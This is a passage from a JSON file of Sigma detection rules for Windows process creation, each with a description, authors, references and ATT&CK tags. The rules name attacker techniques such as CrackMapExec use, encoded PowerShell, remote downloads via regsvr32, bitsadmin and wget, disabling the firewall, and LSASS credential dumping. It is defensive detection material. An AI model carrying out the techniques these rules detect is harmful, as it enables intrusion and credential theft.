"https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml" ], "tags": [ "attack.execution", 
"attack.t1047", "attack.t1053", "attack.t1059.003", "attack.t1059.001", "attack.s0106" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", "value": "HackTool - CrackMapExec Execution Patterns" }, { "description": "Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "FQDNs that start with a number such as \"7-Zip\"" ], "filename": "proc_creation_win_regsvr32_http_ip_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/tccontre18/status/1480950986650832903", "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/mrd0x/status/1461041276514623491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "value": "Potentially Suspicious Regsvr32 HTTP IP Pattern" }, { "description": "Detects usage of SoftPerfect's \"netscan.exe\". 
An application for scanning networks.\nIt is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.\n", "meta": { "author": "@d4ns4n_ (Wuerth-Phoenix)", "creation_date": "2024-04-25", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_win_pua_netscan.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/", "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf", "https://www.softperfect.com/products/networkscanner/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netscan.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca387a8e-1c84-4da3-9993-028b45342d30", "value": "PUA - SoftPerfect Netscan Execution" }, { "description": "Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-08", "falsepositive": [ "System Informer is regularly used legitimately by system administrators or developers. 
Apply additional filters accordingly" ], "filename": "proc_creation_win_pua_system_informer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_system_informer.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.discovery", "attack.defense-evasion", "attack.t1082", "attack.t1564", "attack.t1543" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5722dff1-4bdd-4949-86ab-fbaf707e767a", "value": "PUA - System Informer Execution" }, { "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_encoded_obfusc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "value": "Suspicious Obfuscated PowerShell Code" }, { "description": "Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a 
step in a process of dump file exfiltration.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Legitimate use of WinRAR with a command line in which \".dmp\" or \".dump\" appears accidentally", "Legitimate use of WinRAR to compress WER \".dmp\" files for troubleshooting" ], "filename": "proc_creation_win_winrar_exfil_dmp_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "value": "Winrar Compressing Dump Files" }, { "description": "Detects usage of bitsadmin downloading a file", "meta": { "author": "Michael Haag, FPT.EagleEye", "creation_date": "2017-03-09", "falsepositive": [ "Some legitimate apps use this, but limited." 
], "filename": "proc_creation_win_bitsadmin_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "value": "File Download Via Bitsadmin" }, { "description": "Detects attempts to disable the Windows Firewall using PowerShell", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_disable_firewall.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_firewall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", "value": "Windows Firewall Disabled via PowerShell" }, { "description": "Detects PowerShell downgrade attack by comparing the host versions with the 
actually used engine version 2.0", "meta": { "author": "Harish Segar (rule)", "creation_date": "2020-03-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_downgrade_attack.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3512211-c67e-4707-bedc-66efc7848863", "value": "Potential PowerShell Downgrade Attack" }, { "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "value": "Invoke-Obfuscation Via Use Clip" }, { "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, service information will be displayed on the screen if the service exists.\nA common feedback message is \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_service.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "value": "Service Reconnaissance Via Wmic.EXE" }, { "description": "Detects code execution via Pester.bat (Pester - PowerShell module for testing)", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate use of Pester for writing tests for PowerShell scripts and modules" ], "filename": "proc_creation_win_lolbin_pester_1.yml", "level": "medium", "logsource.category":
"process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "value": "Execute Code with Pester.bat" }, { "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_runxcmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.d7xtech.com/free-software/runx/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93199800-b52a-4dec-b762-75212c196542", "value": "PUA - RunXCmd Execution" }, { "description": "Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe", "meta": { 
"author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wget_download_susp_locations.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.gnu.org/software/wget/manual/wget.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml" ], "tags": [ "attack.execution" ] }, "uuid": "40aa399c-7b02-4715-8e5f-73572b493f33", "value": "Suspicious File Download From IP Via Wget.EXE - Paths" }, { "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-08-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_frombase64string.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "value": "PowerShell Base64 Encoded FromBase64String Cmdlet" }, { "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. 
File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" ], "tags": [ "attack.persistence", "attack.t1546.001" ] }, "related": [ { "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "value": "Change Default File Association To Executable Via Assoc" }, { "description": "Detects suspicious and uncommon child processes of WmiPrvSE", "meta": { "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", 
"https://twitter.com/ForensicITGuy/status/1334734244120309760", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1047", "attack.t1204.002", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "value": "Suspicious WmiPrvSE Child Process" }, { "description": "Detects usage of cmdkey to look for cached credentials on the system", "meta": { "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Legitimate administrative tasks" ], "filename": "proc_creation_win_cmdkey_recon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey", "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ "attack.credential-access", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "value": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE" }, { "description": "Detects an attempt to execute code or create a service on a remote host via winrm.vbs.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/994405551751815170", "https://redcanary.com/blog/lateral-movement-winrm-wmi/", "https://lolbas-project.github.io/lolbas/Scripts/Winrm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "value": "Remote Code Execute via Winrm.vbs" }, { "description": "Detects potential credential dumping via the LSASS Shtinkering technique, which uses Windows Error Reporting (WER) to dump LSASS", "meta": { "author": "@pbssubhash , Nasreddine Bencherchali", "creation_date": "2022-12-08", "falsepositive": [ "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine."
], "filename": "proc_creation_win_werfault_lsass_shtinkering.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "value": "Potential Credential Dumping Via WER" }, { "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", "meta": { "author": "frack113", "creation_date": "2022-07-16", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_susp_16bit_application.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", "value": "Start of NT Virtual DOS Machine" }, { 
"description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "value": "Invoke-Obfuscation Obfuscated IEX Invocation" }, { "description": "Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdbinst_susp_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", 
"https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18ee686c-38a3-4f65-9f44-48a077141f42", "value": "Uncommon Extension Shim Database Installation Via Sdbinst.EXE" }, { "description": "Detects Access to Domain Group Policies stored in SYSVOL", "meta": { "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", "creation_date": "2018-04-09", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_susp_sysvol_access.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", "https://adsecurity.org/?p=2288", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "value": "Suspicious SYSVOL Domain Group Policy Access" }, { "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Very Possible" ], "filename": "proc_creation_win_lolbin_diantz_ads.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": 
"windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "value": "Suspicious Diantz Alternate Data Stream Execution" }, { "description": "Detects suspicious PowerShell process starts with base64 encoded commands (e.g. Emotet)", "meta": { "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "creation_date": "2018-09-03", "falsepositive": [ "No established falsepositives" ], "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "value": "Suspicious Encoded PowerShell Command Line" }, { "description": "Detects the presence of reversed PowerShell commands in the CommandLine.
This is often used as a method of obfuscation by attackers", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "creation_date": "2020-10-11", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "value": "Potential PowerShell Obfuscation Via Reversed Commands" }, { "description": "Detects uncommon child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bginfo_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml" 
